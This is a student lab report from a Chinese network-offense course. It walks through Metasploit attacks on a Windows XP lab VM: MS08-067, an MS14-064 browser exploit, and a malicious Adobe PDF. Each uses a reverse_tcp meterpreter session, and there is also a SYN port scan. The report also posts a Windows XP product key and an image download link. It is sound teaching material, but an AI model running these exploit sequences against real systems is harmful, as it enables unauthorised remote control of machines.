20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
目录
20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
1. 实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
漏洞名称:MS08_067
攻击机:Kali
靶机:windows XP SP3(Chinese)未安装漏洞补丁
这里提供系统镜像:https://pan.baidu.com/s/1Gwjwu-SJtHc7OoALaNNdKA
提取码:b3uj
XP系统激活码QC986-27D34-6M3TY-JJXP9-TBGMD
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.111
msf exploit(ms08_067_netapi) > set LPORT 5101
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.150
msf exploit(ms08_067_netapi) > set target 34//Windows XP SP3 Chinese
msf exploit(ms08_067_netapi) > exploit
攻击成功

1.2 一个针对浏览器的攻击,如ms11_050;(1分)
漏洞名称:MS14-064
攻击机:Kali
靶机:windows XP SP3(Chinese)
输入use exploit/windows/browser/ms14_064_ole_code_execution使用漏洞利用模块
输入set payload windows/meterpreter/reverse_tcp设置反弹连接
输入set SRVHOST 192.168.1.111设置攻击机IP
输入set LHOST 192.168.1.111
输入set AllowPowerShellPrompt true需要用到windows中的powershell
输入set LPORT 5101 设置攻击机监听端口
输入set URIPATH 20165101设置网页地址
输入exploit开始攻击

靶机在浏览器输入http://192.168.1.111:8080/20165101

攻击成功,输入sessions 2,打开会话。

1.3 一个针对客户端的攻击,如Adobe;(1分)
使用adobe_toolbutton模块(唯一)
攻击机:Kali
靶机:windows XP SP3(Chinese)
msf5 > use exploit/windows/fileformat/adobe_toolbutton
msf5 exploit(windows/fileformat/adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_toolbutton) > set LHOST 192.168.1.111
msf5 exploit(windows/fileformat/adobe_toolbutton) > set LPORT 5101
msf5 exploit(windows/fileformat/adobe_toolbutton) > set FILENAME 20165101.pdf
msf5 exploit(windows/fileformat/adobe_toolbutton) > exploit

注意:文件默认放到/root/.msf4/local/目录中,使用mv /root/.msf4/local/20165101.pdf /root/命令复制到主目录下。

在kali上输入back退出当前模块
进入监听模块
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.111
msf5 exploit(multi/handler) > set LPORT 5101
msf5 exploit(multi/handler) > exploit

在XP靶机下打开20165101.pdf文件

攻击成功

1.4 成功应用任何一个辅助模块。(0.5分)
应用扫描端口模块
msf5 > use auxiliary/scanner/portscan/syn 使用扫描模块
msf5 auxiliary(scanner/portscan/syn) > set RHOST 192.168.1.210 设置目标主机IP
msf5 auxiliary(scanner/portscan/syn) > set THREADS 50 设置线程数
msf5 auxiliary(scanner/portscan/syn) > exploit

2. 基础问题回答
2.1 用自己的话解释什么是exploit,payload,encode.
- exploit
利用发现的安全漏洞对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
- payload
在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。
- encode
针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
3. 实践总结与体会
本次漏洞攻击实验非常耗时间,虚拟机里Windows系统的自动更新可能把漏洞已经补好了,所以在漏洞的选择方面不是很顺利。
4. 离实战还缺些什么技术或步骤?
我认为距离实战还缺乏外网穿透到内网的技术,因为我们目前所掌握的技术都仅仅局限于局域网下的攻击,如何绕过复杂的防火墙是我们下一步要学习的重点。
20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20155330 《网络对抗》 Exp5 MSF基础应用
20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 主动攻击实践:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windo ...
随机推荐
- Json对象与Json字符串互转(4种转换方式) jquery 以及 js 的方式
http://blog.csdn.net/zero_295813128/article/details/51545467
- 解决WAS更新web.xml文件不生效的问题(web_merged.xml是罪魁祸首)
问题原因分析 近日碰到更新web.xml文件到WAS服务器(WebSphere Application Server 8.5.5.3)后,不生效的问题. 网上找了一圈,基本都是说WAS缓存引起的. 手 ...
- NYOJ 821 简单求值【简单题】
/* 解题人:lingnichong 解题时间:2014.10.18 00:46 解题体会:简单题 */ 简单求值 时间限制:1000 ms | 内存限制:65535 KB 难度:1 描写叙述 ...
- IE、FF脚本兼容性问题
1.window.event IE有这个对象:FF没有,FF通过参数传递 2.获取事件源 IE:srcElement FF:target 3.添加与去除事件 IE:element.attachEven ...
- Android Log工具之Luffy
Luffy Luffy可以在手机端实时显示你App中的logcat输出.并且具有Log等级与Tag过滤功能.另外Luffy还支持收集Log,保存Log和查看本地log功能. 使用方法 1.Gradle ...
- 巨蟒python全栈开发-第21天 继承
一.今日主要内容 1.了解python2和python3类的区别 python2在2.2之前使用的是经典类,2.2之后,使用的是新式类 class Foo: pass class Foo(object ...
- 巨蟒python全栈开发-第22天 内置常用模块1
一.今日主要内容 1.简单了解模块 你写的每一个py文件都是一个模块 数据结构(队列,栈(重点)) 还有一些我们一直在使用的模块 buildins 内置模块.print,input random 主要 ...
- Audit File Delete
OPEN 4656 ACCESS 4663 AN OBJECT WAS DELETED 4660 CLOSE 4658 1537 = Delete 1538 = Read_CONTROL 1541 ...
- apktool 工具
下载 https://code.google.com/p/android-apktool/ apktool_2.0.0rc2.jar 和apktool linux脚本 ln –s apktool_ ...
- 调用百度API将地名转为经纬度
最近做一道数据科学竞赛题,特征中有城市名和地名,需要转为经纬度来使用 故用python写了一个地名转经纬度的脚本,调用了百度地图的API,key在百度地图开放平台上申请 申请key的地方:http:/ ...